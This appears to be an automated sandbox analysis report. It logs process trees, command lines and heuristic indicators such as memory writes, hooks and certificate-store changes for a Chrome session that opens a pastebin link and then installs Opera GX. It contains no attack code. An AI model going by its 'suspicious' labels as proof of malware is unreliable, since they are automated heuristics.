chrome.exepid Process 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
chrome.exepid Process 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe -
Suspicious use of SetWindowsHookEx 18 IoCs
Processes:
OperaGXSetup.exeopera.exeopera.exeopera.exeAFK Journey.exeSecHealthUI.exeSecHealthUI.exepowershell.exeopera.exe7zFM.exeAll-In-One.exeOperaSetup.exeexplorer.exepid Process 5464 OperaGXSetup.exe 6740 opera.exe 6612 opera.exe 6020 opera.exe 6340 AFK Journey.exe 6340 AFK Journey.exe 6340 AFK Journey.exe 7140 SecHealthUI.exe 6020 SecHealthUI.exe 5880 powershell.exe 812 opera.exe 11688 7zFM.exe 11688 7zFM.exe 5160 All-In-One.exe 5160 All-In-One.exe 3440 OperaSetup.exe 11116 explorer.exe 11116 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrome.exedescription pid Process procid_target PID 748 wrote to memory of 652 748 chrome.exe 73 PID 748 wrote to memory of 652 748 chrome.exe 73 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 3604 748 chrome.exe 75 PID 748 wrote to memory of 2244 748 chrome.exe 76 PID 748 wrote to memory of 2244 748 chrome.exe 76 PID 748 wrote to memory of 164 748 chrome.exe 77 PID 748 wrote to memory of 164 748 chrome.exe 77 PID 748 wrote to memory of 164 748 chrome.exe 77 PID 748 wrote to memory of 164 748 chrome.exe 77 PID 748 wrote to memory of 164 748 chrome.exe 77 PID 748 wrote to memory of 164 748 chrome.exe 77 PID 748 wrote to memory of 164 748 chrome.exe 77 PID 748 wrote to memory of 164 748 chrome.exe 77 PID 748 wrote to memory of 164 748 chrome.exe 77 PID 748 wrote to memory of 164 748 chrome.exe 77 PID 748 wrote to memory of 164 748 chrome.exe 77 PID 748 wrote to memory of 164 748 chrome.exe 77 PID 748 wrote to memory of 164 748 chrome.exe 77 PID 748 wrote to memory of 164 748 chrome.exe 77 PID 748 wrote to memory of 164 748 chrome.exe 77 PID 748 wrote to memory of 164 748 chrome.exe 77 PID 748 wrote to memory of 164 748 chrome.exe 77 PID 748 wrote to memory of 164 748 chrome.exe 77 PID 748 wrote to memory of 164 748 chrome.exe 77 PID 748 wrote to memory of 164 748 chrome.exe 77 PID 748 wrote to memory of 164 748 chrome.exe 77 PID 748 wrote to memory of 164 748 chrome.exe 77 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://pastebin.com/raw/DUwCkj2E1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff9941f9758,0x7ff9941f9768,0x7ff9941f97782⤵PID:652
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1528 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:22⤵PID:3604
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1744 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:82⤵PID:2244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2008 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:82⤵PID:164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2904 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:12⤵PID:5012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2932 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:12⤵PID:592
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4608 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:82⤵PID:1904
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4684 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:82⤵PID:1540
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4916 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:82⤵PID:5060
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4952 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:12⤵PID:2708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5464 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:12⤵PID:4220
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4604 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:12⤵PID:2812
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5576 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:12⤵PID:1304
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5724 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:12⤵PID:1920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5960 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:12⤵PID:4216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=6068 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:12⤵PID:3536
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=6284 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:12⤵PID:4256
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=6448 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:12⤵PID:2280
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=6616 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:12⤵PID:3872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6952 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:82⤵PID:2476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=7248 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:12⤵PID:4476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=6832 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:12⤵PID:5172
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7720 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:82⤵PID:5784
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7620 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:82⤵PID:6068
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7520 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:82⤵PID:6076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=7744 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:12⤵PID:6092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7608 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:82⤵PID:2888
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1468 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:82⤵PID:5312
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1820 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:82⤵PID:5316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7552 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:82⤵PID:5444
-
-
C:\Users\Admin\Downloads\OperaGXSetup.exe"C:\Users\Admin\Downloads\OperaGXSetup.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:5464 -
C:\Users\Admin\Downloads\OperaGXSetup.exeC:\Users\Admin\Downloads\OperaGXSetup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=109.0.5097.98 --initial-client-data=0x2ac,0x2b0,0x2b4,0x2a8,0x2b8,0x736b4260,0x736b426c,0x736b42783⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3476
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\OperaGXSetup.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\OperaGXSetup.exe" --version3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5760
-
-
C:\Users\Admin\Downloads\OperaGXSetup.exe"C:\Users\Admin\Downloads\OperaGXSetup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=1 --general-interests=1 --general-location=1 --personalized-content=1 --personalized-ads=1 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera GX" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --server-tracking-data=server_tracking_data --initial-pid=5464 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_20240522194027" --session-guid=6fea7034-32cb-457d-b0c4-45c7552341ce --server-tracking-blob="ZTI2ZWM0ODBjMGNhMjFhYTdhMDZlMjZhYzFhNWIwZGMzNmY5YjQxMDQ4OGM2ZjM0ZjFkZTM1OWYxMjQ2Y2Y5Njp7ImNvdW50cnkiOiJHQiIsImVkaXRpb24iOiJzdGQtMiIsImh0dHBfcmVmZXJyZXIiOiJodHRwczovL3d3dy5vcGVyYS5jb20vIiwiaW5zdGFsbGVyX25hbWUiOiJPcGVyYUdYU2V0dXAuZXhlIiwicHJvZHVjdCI6eyJuYW1lIjoib3BlcmFfZ3gifSwicXVlcnkiOiIvb3BlcmFfZ3gvc3RhYmxlL3dpbmRvd3M/ZWRpdGlvbj1zdGQtMiZ1dG1fc291cmNlPVBXTmdhbWVzJnV0bV9tZWRpdW09cGEmdXRtX2NhbXBhaWduPVBXTl9HQl9IVlJfT09NJmVkaXRpb249c3RkLTImdXRtX2lkPWJlM2ZlYzFmNGQwZTQ5MTY4N2M1MDA0OTUzM2FkNmU4Jmh0dHBfcmVmZXJyZXI9aHR0cHMlM0ElMkYlMkZ3d3cub3BlcmEuY29tJTJGZ3glM0Z1dG1fc291cmNlJTNEUFdOZ2FtZXMlMjZ1dG1fbWVkaXVtJTNEcGElMjZ1dG1fY2FtcGFpZ24lM0RQV05fR0JfSFZSX09PTSUyNnV0bV9pZCUzRGJlM2ZlYzFmNGQwZTQ5MTY4N2M1MDA0OTUzM2FkNmU4JTI2ZWRpdGlvbiUzRHN0ZC0yJnV0bV9zaXRlPW9wZXJhX2NvbSZ1dG1fbGFzdHBhZ2U9b3BlcmEuY29tJTJGJnV0bV9pZD1iZTNmZWMxZjRkMGU0OTE2ODdjNTAwNDk1MzNhZDZlOCZkbF90b2tlbj02MDM5MTI2OSIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxNjQwNjgyMS44NTk5IiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEwNi4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoiUFdOX0dCX0hWUl9PT00iLCJpZCI6ImJlM2ZlYzFmNGQwZTQ5MTY4N2M1MDA0OTUzM2FkNmU4IiwibGFzdHBhZ2UiOiJvcGVyYS5jb20vIiwibWVkaXVtIjoicGEiLCJzaXRlIjoib3BlcmFfY29tIiwic291cmNlIjoiUFdOZ2FtZXMifSwidXVpZCI6IjQ5OTJhMmRiLTVhNTAtNGI1Zi1iODNiLTYwYjAwZDM2MmQ2MiJ9 " --desktopshortcut=1 --wait-for-package --initial-proc-handle=78090000000000003⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:6100 -
C:\Users\Admin\Downloads\OperaGXSetup.exeC:\Users\Admin\Downloads\OperaGXSetup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=109.0.5097.98 --initial-client-data=0x2a0,0x2a4,0x2a8,0x27c,0x2b8,0x713d4260,0x713d426c,0x713d42784⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4264
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\installer.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\installer.exe" --backend --initial-pid=5464 --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=1 --general-interests=1 --general-location=1 --personalized-content=1 --personalized-ads=1 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera GX" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --server-tracking-data=server_tracking_data --package-dir="C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202405221940271" --session-guid=6fea7034-32cb-457d-b0c4-45c7552341ce --server-tracking-blob="ZTI2ZWM0ODBjMGNhMjFhYTdhMDZlMjZhYzFhNWIwZGMzNmY5YjQxMDQ4OGM2ZjM0ZjFkZTM1OWYxMjQ2Y2Y5Njp7ImNvdW50cnkiOiJHQiIsImVkaXRpb24iOiJzdGQtMiIsImh0dHBfcmVmZXJyZXIiOiJodHRwczovL3d3dy5vcGVyYS5jb20vIiwiaW5zdGFsbGVyX25hbWUiOiJPcGVyYUdYU2V0dXAuZXhlIiwicHJvZHVjdCI6eyJuYW1lIjoib3BlcmFfZ3gifSwicXVlcnkiOiIvb3BlcmFfZ3gvc3RhYmxlL3dpbmRvd3M/ZWRpdGlvbj1zdGQtMiZ1dG1fc291cmNlPVBXTmdhbWVzJnV0bV9tZWRpdW09cGEmdXRtX2NhbXBhaWduPVBXTl9HQl9IVlJfT09NJmVkaXRpb249c3RkLTImdXRtX2lkPWJlM2ZlYzFmNGQwZTQ5MTY4N2M1MDA0OTUzM2FkNmU4Jmh0dHBfcmVmZXJyZXI9aHR0cHMlM0ElMkYlMkZ3d3cub3BlcmEuY29tJTJGZ3glM0Z1dG1fc291cmNlJTNEUFdOZ2FtZXMlMjZ1dG1fbWVkaXVtJTNEcGElMjZ1dG1fY2FtcGFpZ24lM0RQV05fR0JfSFZSX09PTSUyNnV0bV9pZCUzRGJlM2ZlYzFmNGQwZTQ5MTY4N2M1MDA0OTUzM2FkNmU4JTI2ZWRpdGlvbiUzRHN0ZC0yJnV0bV9zaXRlPW9wZXJhX2NvbSZ1dG1fbGFzdHBhZ2U9b3BlcmEuY29tJTJGJnV0bV9pZD1iZTNmZWMxZjRkMGU0OTE2ODdjNTAwNDk1MzNhZDZlOCZkbF90b2tlbj02MDM5MTI2OSIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxNjQwNjgyMS44NTk5IiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEwNi4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoiUFdOX0dCX0hWUl9PT00iLCJpZCI6ImJlM2ZlYzFmNGQwZTQ5MTY4N2M1MDA0OTUzM2FkNmU4IiwibGFzdHBhZ2UiOiJvcGVyYS5jb20vIiwibWVkaXVtIjoicGEiLCJzaXRlIjoib3BlcmFfY29tIiwic291cmNlIjoiUFdOZ2FtZXMifSwidXVpZCI6IjQ5OTJhMmRiLTVhNTAtNGI1Zi1iODNiLTYwYjAwZDM2MmQ2MiJ9 " --desktopshortcut=1 --install-subfolder=109.0.5097.984⤵
- Executes dropped EXE
- Loads dropped DLL
- Registers COM server for autorun
- Enumerates connected drives
- Modifies registry class
PID:1068 -
C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\installer.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktopGX --annotation=ver=109.0.5097.98 --initial-client-data=0x274,0x278,0x27c,0x24c,0x280,0x7ff983fedd80,0x7ff983fedd8c,0x7ff983fedd985⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5612
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\installer_helper_64.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\installer_helper_64.exe" 1 "C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202405221940271\Opera GX Browser.lnk"5⤵
- Executes dropped EXE
